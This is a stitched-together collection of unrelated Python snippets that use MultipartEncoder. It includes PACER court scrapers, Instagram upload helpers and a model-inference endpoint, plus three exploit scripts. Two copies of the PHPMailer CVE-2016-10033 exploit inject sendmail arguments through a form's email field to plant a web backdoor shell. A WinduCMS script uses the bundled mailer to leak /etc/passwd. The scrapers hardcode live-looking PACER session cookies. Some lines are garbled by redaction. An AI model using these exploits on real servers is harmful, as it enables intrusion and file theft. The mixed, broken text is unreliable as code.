def connection_speed_test():
    """Connection speed test."""
    response_body = {}
    status_code = None
    try:
        worker_id = request.args.get("worker_id", None)
        nonce = request.args.get("random", None)
        is_ping = request.args.get("is_ping", None)
        # Both identifiers are mandatory for every variant of the test.
        if not worker_id or not nonce:
            raise PyGridError
        if request.method == "GET":
            if is_ping is None:
                # Download data sample (64MB)
                data_sample = b"x" * 67108864  # 64 Megabyte
                form = MultipartEncoder({"sample": data_sample})
                return Response(form.to_string(), mimetype=form.content_type)
            status_code = 200  # Success
        elif request.method == "POST":
            # Upload test: the payload itself is ignored.
            status_code = 200  # Success
    except PyGridError as e:
        status_code = 400  # Bad Request
        response_body[RESPONSE_MSG.ERROR] = str(e)
    except Exception as e:
        status_code = 500  # Internal Server Error
        response_body[RESPONSE_MSG.ERROR] = str(e)
    return Response(json.dumps(response_body), status=status_code,
                    mimetype="application/json")
) print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com") print( " Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n" ) target = 'http://*****:*****@protonmail.com', 'message': 'Pwned' } m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe') headers = {'User-Agent': 'curl/7.47.0', 'Content-Type': m.content_type} proxies = {'http': 'localhost:8081', 'https': 'localhost:8081'} print('[+] SeNdiNG eVIl SHeLL To TaRGeT....') r = requests.post(target, data=m.to_string(), headers=headers) print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D') r = requests.get(target + backdoor, headers=headers) if r.status_code == 200: print('[+] ExPLoITeD ' + target)
def parse8(self, response):
    # Second hop of the PDF-download flow. The first POST may land on an
    # interstitial "Document Number" page whose link must be re-POSTed
    # with the same form data (-> parse9), directly on a page embedding
    # the PDF in an iframe (-> parse10), or on the raw PDF bytes, which
    # are saved to disk. Docket metadata rides along in request meta.
    try:
        # The interstitial page is recognised by the text "Document
        # Number" in the first table cell (whitespace-insensitively).
        if "".join(response.xpath('//*[@id="cmecfMainContent"]/table/tr[1]/td[1]/b//text()').extract()).replace(' ','').replace('\n','').replace('\t','').replace('\r','').lower().find('documentnumber')>-1:
            url=response.xpath('//*[@id="cmecfMainContent"]/table/tr[1]/td[1]/a/@href').extract()[0]
            form_data=response.meta['form_data']
            me = MultipartEncoder(fields=form_data)
            me_boundary = me.boundary[2:] #need this in headers
            me_length = me.len #need this in headers
            me_body = me.to_string()
            header={'Connection': 'keep-alive' ,
                    'Cache-Control': 'max-age=0' ,
                    'Origin': 'https://ecf.almd.uscourts.gov' ,
                    'Upgrade-Insecure-Requests': '1' ,
                    'Content-Type': 'multipart/form-data; charset=utf-8; boundary=' + me_boundary,
                    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' ,
                    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' ,
                    'Referer': 'https://ecf.almd.uscourts.gov/' ,
                    'Accept-Encoding': 'gzip, deflate, br' ,
                    'Accept-Language': 'en-US,en;q=0.9'}
            # The link may be absolute or relative to the court's base url.
            if url.find('http')>-1:
                req=scrapy.Request(url, meta = {'dont_redirect': True,'handle_httpstatus_list': [500,302]}, body=me_body, headers=header, callback=self.parse9, method="POST")
            else:
                req=scrapy.Request(response.meta['base_url'].rstrip('/')+url, meta = {'dont_redirect': True,'handle_httpstatus_list': [500,302]}, body=me_body, headers=header, callback=self.parse9, method="POST")
            # Hard-coded PACER session cookies captured from a browser.
            req.cookies={'_ga':'GA1.2.1437274789.1534401822', 'ClientValidation':"", 'ClientCodeDescription':"", 'MENU':'slow', 'PacerSession':'0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'NextGenCSO':'0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'PacerClientCode':'Lumina', 'PacerClient':"", 'ClientDesc':"", 'PacerPref':"receipt=Y"}
            req.meta['pdfname']=response.meta['pdfname']
            req.meta['base_url']=response.meta['base_url']
            req.meta['case_number']=response.meta['case_number']
            req.meta['case_name']=response.meta['case_name']
            req.meta['description']=response.meta['description']
            req.meta['date_filed']=response.meta['date_filed']
            req.meta['initial_url']=response.meta['initial_url']
            yield req
        else:
            try:
                # The document page usually embeds the PDF in an iframe;
                # fetch its src and hand it to parse10 for saving.
                pdflink=response.meta['base_url'].rstrip('/')+response.xpath('//iframe/@src').extract()[0]
                requsturl=scrapy.http.Request(pdflink,headers={'Connection': 'keep-alive' ,
                        'Cache-Control': 'max-age=0' ,
                        'Origin': 'https://ecf.almd.uscourts.gov' ,
                        'Upgrade-Insecure-Requests': '1' ,
                        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' ,
                        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' ,
                        'Referer': 'https://ecf.almd.uscourts.gov/' ,
                        'Accept-Encoding': 'gzip, deflate, br' ,
                        'Accept-Language': 'en-US,en;q=0.9'}, callback=self.parse10)
                requsturl.meta['pdfname']=response.meta['pdfname']
                requsturl.meta['base_url']=response.meta['base_url']
                requsturl.meta['case_number']=response.meta['case_number']
                requsturl.meta['case_name']=response.meta['case_name']
                requsturl.meta['description']=response.meta['description']
                requsturl.meta['date_filed']=response.meta['date_filed']
                yield requsturl
            except:
                # No iframe found: assume the response body is the PDF
                # itself and save it directly.
                with open(response.meta['pdfname'],'wb') as f1:
                    f1.write(response.body)
                item=PacerItems()
                item['pdflink']="Saved_pdf"
                item['base_url']=response.meta['base_url']
                item['case_number']=response.meta['case_number']
                item['case_name']=response.meta['case_name']
                item['description']=response.meta['description']
                item['date_filed']=response.meta['date_filed']
                yield item
    except:
        # Any parsing failure: if the body starts with the PDF magic
        # bytes, save it as the document; otherwise the row is dropped.
        if response.body.find('%PDF')==0:
            with open(response.meta['pdfname'],'wb') as f1:
                f1.write(response.body)
            item=PacerItems()
            item['pdflink']="Saved_pdf"
            item['base_url']=response.meta['base_url']
            item['case_number']=response.meta['case_number']
            item['case_name']=response.meta['case_name']
            item['description']=response.meta['description']
            item['date_filed']=response.meta['date_filed']
            yield item
def upload_video(self, video, thumbnail, caption=None, upload_id=None):
    """Upload a video to Instagram in four sequential chunks.

    @param video      Path to the video file (String)
    @param thumbnail  Path to the thumbnail image file (String)
    @param caption    Media caption (String, optional)
    @param upload_id  Unique upload id (String). When None, generated
                      from the current time in milliseconds
    @return True on success, False otherwise
    """
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    data = {
        'upload_id': upload_id,
        '_csrftoken': self.token,
        'media_type': '2',
        '_uuid': self.uuid,
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({'X-IG-Capabilities': '3Q4=',
                                 'X-IG-Connection-Type': 'WIFI',
                                 'Host': 'i.instagram.com',
                                 'Cookie2': '$Version=1',
                                 'Accept-Language': 'en-US',
                                 'Accept-Encoding': 'gzip, deflate',
                                 'Content-type': m.content_type,
                                 'Connection': 'keep-alive',
                                 'User-Agent': self.user_agent})
    response = self.session.post(config.API_URL + "upload/video/",
                                 data=m.to_string())
    if response.status_code == 200:
        body = json.loads(response.text)
        upload_url = body['video_upload_urls'][3]['url']
        upload_job = body['video_upload_urls'][3]['job']
        with open(video, 'rb') as video_bytes:
            video_data = video_bytes.read()
        # solve issue #85 TypeError: slice indices must be integers or
        # None or have an __index__ method
        request_size = len(video_data) // 4
        last_request_extra = len(video_data) - 3 * request_size
        headers = copy.deepcopy(self.session.headers)
        self.session.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': 'application/octet-stream',
            'Session-ID': upload_id,
            'Connection': 'keep-alive',
            'Content-Disposition': 'attachment; filename="video.mov"',
            'job': upload_job,
            'Host': 'upload.instagram.com',
            'User-Agent': self.user_agent
        })
        try:
            for i in range(4):
                start = i * request_size
                # Last chunk absorbs the division remainder.
                if i == 3:
                    end = i * request_size + last_request_extra
                else:
                    end = (i + 1) * request_size
                length = last_request_extra if i == 3 else request_size
                content_range = "bytes {start}-{end}/{len_video}".format(
                    start=start, end=end - 1,
                    len_video=len(video_data)).encode('utf-8')
                self.session.headers.update(
                    {'Content-Length': str(end - start),
                     'Content-Range': content_range})
                response = self.session.post(
                    upload_url, data=video_data[start:start + length])
        finally:
            # BUGFIX: restore the pre-chunk session headers even when a
            # chunk POST raises; previously an exception here left the
            # shared session polluted with per-chunk headers
            # (Content-Range, job, Session-ID, ...).
            self.session.headers = headers
        if response.status_code == 200:
            if self.configure_video(upload_id, video, thumbnail, caption):
                self.expose()
                return True
    return False
def upload_video(
        self,
        path_to_video: str,
        path_to_thumbnail: str,
        caption: Optional[str] = None,
        upload_id: Optional[str] = None,
        is_sidecar: Optional[bool] = None
) -> None:
    """
    Upload video to Instagram

    Args:
        path_to_video: str
            Path to video file
        path_to_thumbnail: str
            Path to thumbnail image file
        caption: str
            Post caption
        upload_id: str
            Unique upload id; generated from the current time in
            milliseconds when omitted
        is_sidecar: bool
            Is part of carousel/a post with multiple videos or photos
    """
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    data = {
        'upload_id': upload_id,
        '_csrftoken': self.token,
        'media_type': '2',
        '_uuid': self.uuid
    }
    if is_sidecar:
        data['is_sidecar'] = '1'
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({
        'X-IG-Capabilities': '3Q4=',
        'X-IG-Connection-Type': 'WIFI',
        'Host': 'i.instagram.com',
        'Cookie2': '$Version=1',
        'Accept-Language': 'en-US',
        'Accept-Encoding': 'gzip, deflate',
        'Content-type': m.content_type,
        'Connection': 'keep-alive',
        'User-Agent': self.USER_AGENT
    })
    response = self.session.post(f"{self.API_URL}upload/video/",
                                 data=m.to_string())
    if response.status_code == 200:
        body = json.loads(response.text)
        upload_url = body['video_upload_urls'][3]['url']
        upload_job = body['video_upload_urls'][3]['job']
        # BUGFIX: read via a context manager — the file handle was
        # previously never closed (open(...).read()).
        with open(path_to_video, 'rb') as video_file:
            video_data = video_file.read()
        # solve issue #85 TypeError: slice indices must be integers or
        # None or have an __index__ method (floor division keeps ints)
        request_size = len(video_data) // 4
        last_request_extra = len(video_data) - (request_size * 3)
        headers = copy.deepcopy(self.session.headers)
        self.session.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': 'application/octet-stream',
            'Session-ID': upload_id,
            'Connection': 'keep-alive',
            'Content-Disposition': 'attachment; filename="video.mov"',
            'job': upload_job,
            'Host': 'upload.instagram.com',
            'User-Agent': self.USER_AGENT
        })
        try:
            for i in range(0, 4):
                start = i * request_size
                # Last chunk absorbs the division remainder.
                if i == 3:
                    end = i * request_size + last_request_extra
                else:
                    end = (i + 1) * request_size
                length = last_request_extra if i == 3 else request_size
                content_range = f"bytes {start}-{end - 1}/{len(video_data)}"
                self.session.headers.update({
                    'Content-Length': str(end - start),
                    'Content-Range': content_range
                })
                response = self.session.post(
                    upload_url, data=video_data[start:start + length])
        finally:
            # BUGFIX: restore the pre-chunk session headers even when a
            # chunk POST raises, instead of only on the success path.
            self.session.headers = headers
        if response.status_code == 200:
            if self.configure_video(upload_id, path_to_video,
                                    path_to_thumbnail, caption):
                self.expose()
def _do_inference(self, model_fn):
    """HTTP endpoint provided by the gateway.

    This function should be partially applied with the model_fn
    argument before it is added as a Flask route. Flask functions do
    not need to take any arguments. They receive the request data via
    the module variable flask.request, which is... somehow always
    supposed to be accurate within the context of a request-handler.

    :param callable model_fn: the callback function to use for
        inference.
    """
    r = flask.request
    # Charset falls back to UTF-8 when the request does not declare one.
    try:
        encoding = r.mimetype_params['charset']
    except KeyError:
        encoding = 'utf-8'
    # Only multipart/related payloads are accepted; anything else is a
    # client error.
    if not r.content_type.startswith('multipart/related'):
        msg = 'invalid content-type {}'.format(r.content_type)
        logger.error(msg)
        return make_response(msg, 400)
    # Decode JSON and DICOMs into BytesIO buffers and pass to model
    mp = MultipartDecoder(
        content=r.get_data(),
        content_type=r.content_type,
        encoding=encoding
    )
    # Hash every incoming part so request/response pairs can be
    # correlated in the logs via the digest tags below.
    input_hash = hashlib.sha256()
    for part in mp.parts:
        input_hash.update(part.content)
    input_digest = input_hash.hexdigest()
    logger.debug('received request with hash %s' % input_digest)
    test_logger = tagged_logger.TaggedLogger(logger)
    test_logger.add_tags({
        'input_hash': input_digest
    })
    # The first part is the JSON body; the remaining parts are binary
    # payloads (DICOMs, per the comment above) wrapped in BytesIO.
    request_json_body = json.loads(mp.parts[0].text)
    request_binary_dicom_parts = [BytesIO(p.content) for p in mp.parts[1:]]
    response_json_body, response_binary_elements = model_fn(
        request_json_body,
        request_binary_dicom_parts,
        input_digest
    )
    # Output digest covers the serialized JSON followed by every binary
    # element, in order.
    output_hash = hashlib.sha256()
    output_hash.update(json.dumps(response_json_body).encode('utf-8'))
    for part in response_binary_elements:
        output_hash.update(part)
    output_digest = output_hash.hexdigest()
    test_logger.add_tags({
        'output_hash': output_digest
    })
    test_logger.debug('request processed')
    logger.debug('sending response with hash %s' % output_digest)
    # Serialize model response to text
    response_body_text_elements = self._serializer(
        response_json_body,
        response_binary_elements
    )
    # Assemble the list of multipart/related parts
    # The json response must be the first part
    fields = []
    fields.append(
        self._make_field_tuple(
            'json-body',
            json.dumps(response_json_body),
            content_type='application/json'
        )
    )
    fields.extend(
        self._make_field_tuple('elem_{}'.format(i), elem, mimetype)
        for i, (mimetype, elem) in enumerate(response_body_text_elements)
    )
    # Final part carries "input:output" digests so the caller can verify
    # what was processed.
    fields.append(
        self._make_field_tuple(
            'hashes',
            input_digest + ':' + output_digest,
            content_type='text/plain'
        )
    )
    # Encode using the same boundary and encoding as original
    encoder = MultipartEncoder(
        fields,
        encoding=mp.encoding,
        boundary=mp.boundary
    )
    # Override the Content-Type header that MultipartEncoder uses
    # flask.make_response takes content, response code, and headers
    return make_response(
        encoder.to_string(),
        200,
        {'Content-Type': 'multipart/related; boundary={}'.format(mp.boundary)}
    )
# in order to not work out of the box fields = { 'action': 'submit', 'name': payload, 'email': '"a\\\" -OQueueDirectory=%s -X%s/%s \"@protonmail.com' % (queue_dir_path, www_path, backdoor_file), 'message': 'Pwned' } m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe') headers = {'User-Agent': 'curl/7.47.0', 'Content-Type': m.content_type} # If set runs HTTP requests through Burp proxies = {'http': 'localhost:8080', 'https': 'localhost:8080'} # proxies = None log.info("Sending SHELL to target") r = requests.post(target, data=m.to_string(), headers=headers, proxies=proxies) log.info("Finish") if r.status_code == 200: log.info("Exploited %s" % target)
# ASCII-art banner followed by the exploit body.
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
# NOTE(review): the next line is redaction-mangled ("*****" placeholders
# collapsed several statements into one). The original presumably set
# `target`, `backdoor`, a sendmail-injection payload and a `fields` dict
# ending in 'message': 'Pwned'. As written it is not valid Python —
# restore from the upstream exploit source before running.
target = 'http://*****:*****@protonmail.com', 'message': 'Pwned'}
m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
headers={'User-Agent': 'curl/7.47.0', 'Content-Type': m.content_type}
# Burp-style local proxy dict — declared but not passed to the requests
# calls below, so it has no effect as written.
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(), headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+] ExPLoITeD ' + target)
def parse6(self, response):
    """Submit the PACER case-search form as multipart/form-data.

    Encodes hard-coded search criteria with MultipartEncoder, POSTs
    them (with the session cookies) to the form's action URL extracted
    from the page, and hands the response to parse7.

    @param response  scrapy Response for the search-form page; its meta
                     must carry 'base_url' and 'initial_url'
    @return yields a single scrapy.Request (generator)
    """
    form_data = {
        'all_case_ids': '0',
        'case_num': '',
        'last_name': '',
        'first_name': '',
        'middle_name': '',
        'office': '',
        'nsuit': '',
        'case_type': '',
        'cause': '',
        'case_flags': '',
        'filed_from': '9/12/2018',
        'filed_to': '10/12/2018',
        'ShowFull': '1',
        'Key1': 'cs_sort_case_numb',
        'UserType': ''
    }
    me = MultipartEncoder(fields=form_data)
    # me.boundary is prefixed with '--'; the Content-Type header needs
    # the bare boundary value.
    me_boundary = me.boundary[2:]
    me_body = me.to_string()
    header = {
        'Connection': 'keep-alive',
        'Cache-Control': 'max-age=0',
        'Origin': 'https://ecf.almd.uscourts.gov',
        'Upgrade-Insecure-Requests': '1',
        'Content-Type': 'multipart/form-data; charset=utf-8; boundary=' + me_boundary,
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
        'Referer': 'https://ecf.almd.uscourts.gov/',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'en-US,en;q=0.9'
    }
    # The form's action is relative ("../..."); strip the '..' and join
    # it onto the court's base URL.
    urlcode = response.xpath(
        '//*[@id="cmecfMainContent"]/form/@action').extract()[0]
    link = response.meta['base_url'].rstrip('/') + urlcode.replace(
        '..', '')
    req = scrapy.Request(link,
                         meta={
                             'dont_redirect': True,
                             'handle_httpstatus_list': [500, 302]
                         },
                         body=me_body,
                         headers=header,
                         callback=self.parse7,
                         method="POST")
    # Session/auth cookies captured from an authenticated PACER session.
    req.cookies = {
        '_ga': 'GA1.2.1437274789.1534401822',
        'ClientValidation': "",
        'ClientCodeDescription': "",
        'MENU': 'slow',
        'PacerSession': '0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q',
        'NextGenCSO': '0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q',
        'PacerClientCode': 'Lumina',
        'PacerClient': "",
        'ClientDesc': "",
        'PacerPref': "receipt=Y"
    }
    req.meta['base_url'] = response.meta['base_url']
    req.meta['initial_url'] = response.meta['initial_url']
    yield req
def upload_photo(self, photo, caption=None, upload_id=None,
                 from_video=False, force_resize=False, options=None):
    """Upload photo to Instagram

    @param photo         Path to photo file (String)
    @param caption       Media description (String)
    @param upload_id     Unique upload_id (String). When None, then
                         generate automatically
    @param from_video    A flag that signals whether the photo is loaded
                         from the video or by itself
                         (Boolean, DEPRECATED: not used)
    @param force_resize  Force photo resize (Boolean)
    @param options       Object with difference options, e.g.
                         configure_timeout, rename (Dict)
                         Designed to reduce the number of function
                         arguments! This is the simplest request object.
    @return media object on success, False otherwise
    """
    # BUGFIX: the default was a shared mutable dict (options={}); use
    # None and normalize here. Behavior is unchanged because the merge
    # below already used `options or {}`.
    options = dict({
        'configure_timeout': 15,
        'rename': True
    }, **(options or {}))
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    if not photo:
        return False
    if not compatible_aspect_ratio(get_image_size(photo)):
        self.logger.error(
            'Photo does not have a compatible photo aspect ratio.')
        if force_resize:
            photo = resize_image(photo)
        else:
            return False
    with open(photo, 'rb') as f:
        photo_bytes = f.read()
    data = {
        'upload_id': upload_id,
        '_uuid': self.uuid,
        '_csrftoken': self.token,
        'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
        'photo': ('pending_media_%s.jpg' % upload_id, photo_bytes,
                  'application/octet-stream', {
                      'Content-Transfer-Encoding': 'binary'
                  })
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({
        'X-IG-Capabilities': '3Q4=',
        'X-IG-Connection-Type': 'WIFI',
        'Cookie2': '$Version=1',
        'Accept-Language': 'en-US',
        'Accept-Encoding': 'gzip, deflate',
        'Content-type': m.content_type,
        'Connection': 'close',
        'User-Agent': self.user_agent
    })
    response = self.session.post(config.API_URL + "upload/photo/",
                                 data=m.to_string())
    configure_timeout = options.get('configure_timeout')
    if response.status_code == 200:
        # Configure may fail transiently; retry up to four times with an
        # optional delay before each attempt.
        for attempt in range(4):
            if configure_timeout:
                time.sleep(configure_timeout)
            if self.configure_photo(upload_id, photo, caption):
                media = self.last_json.get('media')
                self.expose()
                if options.get('rename'):
                    # Mark the local file as consumed so it is not
                    # uploaded again by batch scripts.
                    from os import rename
                    rename(photo, "{}.REMOVE_ME".format(photo))
                return media
    return False
def uploadVideo(self, video, thumbnail, caption=None, upload_id=None):
    """Upload a video to Instagram in four sequential chunks.

    @param video      Path to the video file (String)
    @param thumbnail  Path to the thumbnail image file (String)
    @param caption    Media caption (String, optional)
    @param upload_id  Unique upload id (String). When None, generated
                      from the current time in milliseconds
    @return False (see NOTE at the end)
    """
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    data = {
        'upload_id': upload_id,
        '_csrftoken': self.token,
        'media_type': '2',
        '_uuid': self.uuid,
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.s.headers.update({
        'X-IG-Capabilities': '3Q4=',
        'X-IG-Connection-Type': 'WIFI',
        'Host': 'i.instagram.com',
        'Cookie2': '$Version=1',
        'Accept-Language': 'en-US',
        'Accept-Encoding': 'gzip, deflate',
        'Content-type': m.content_type,
        'Connection': 'keep-alive',
        'User-Agent': self.USER_AGENT
    })
    response = self.s.post(self.API_URL + "upload/video/",
                           data=m.to_string())
    if response.status_code == 200:
        body = json.loads(response.text)
        upload_url = body['video_upload_urls'][3]['url']
        upload_job = body['video_upload_urls'][3]['job']
        # BUGFIX: read via a context manager — the file handle was
        # previously never closed (open(...).read()).
        with open(video, 'rb') as video_file:
            videoData = video_file.read()
        # Floor division keeps slice indices as ints (same value as the
        # original math.floor(len/4)).
        request_size = len(videoData) // 4
        lastRequestExtra = (len(videoData) - (request_size * 3))
        headers = copy.deepcopy(self.s.headers)
        self.s.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': 'application/octet-stream',
            'Session-ID': upload_id,
            'Connection': 'keep-alive',
            'Content-Disposition': 'attachment; filename="video.mov"',
            'job': upload_job,
            'Host': 'upload.instagram.com',
            'User-Agent': self.USER_AGENT
        })
        try:
            for i in range(0, 4):
                start = i * request_size
                # Last chunk absorbs the division remainder.
                if i == 3:
                    end = i * request_size + lastRequestExtra
                else:
                    end = (i + 1) * request_size
                length = lastRequestExtra if i == 3 else request_size
                content_range = "bytes {start}-{end}/{lenVideo}".format(
                    start=start, end=(end - 1),
                    lenVideo=len(videoData)).encode('utf-8')
                self.s.headers.update({
                    'Content-Length': str(end - start),
                    'Content-Range': content_range,
                })
                response = self.s.post(upload_url,
                                       data=videoData[start:start + length])
        finally:
            # BUGFIX: restore the pre-chunk session headers even when a
            # chunk POST raises.
            self.s.headers = headers
        if response.status_code == 200:
            if self.configureVideo(upload_id, video, thumbnail, caption):
                self.expose()
    # NOTE(review): control falls through to False even when upload and
    # configure succeed — kept as-is to preserve the original contract,
    # but callers cannot distinguish success from failure here.
    return False
# Vendor Homepage: http://windu.org
# Version: 3.1
# Tested on: Linux Debian 9
#
# Local File Disclosure in WinduCMS via the bundled, vulnerable
# PHPMailer 5.2.1. The PoC needs a contact form on the target site,
# e.g.: {{W name=contactForm inputs="name" email="root@localhost"}}
# The payload below abuses the mailer to leak /etc/passwd.

import requests
from requests_toolbelt import MultipartEncoder

print("WinduCMS <= 3.1 Exploit")

# Target contact-form endpoint and the injected field values.
target_url = 'http://localhost/contact_page?mn=contactform.message.negative'
sender_email = '*****@*****.**'
lfd_payload = '<img src="/etc/passwd"'
visible_field = 'name'

form_fields = {
    'form_key': 'contactForm',
    visible_field: 'Attacker',
    'email': sender_email,
    'content': lfd_payload,
}

# Fixed boundary mimics a real browser's multipart submission.
encoder = MultipartEncoder(fields=form_fields,
                           boundary='----WebKitFormBoundary1500777958139315')
request_headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0',
    'Content-Type': encoder.content_type,
}

print('Sending payload to target...')
resp = requests.post(target_url, data=encoder.to_string(),
                     headers=request_headers)
if resp.status_code == 200:
    print('Exploited.')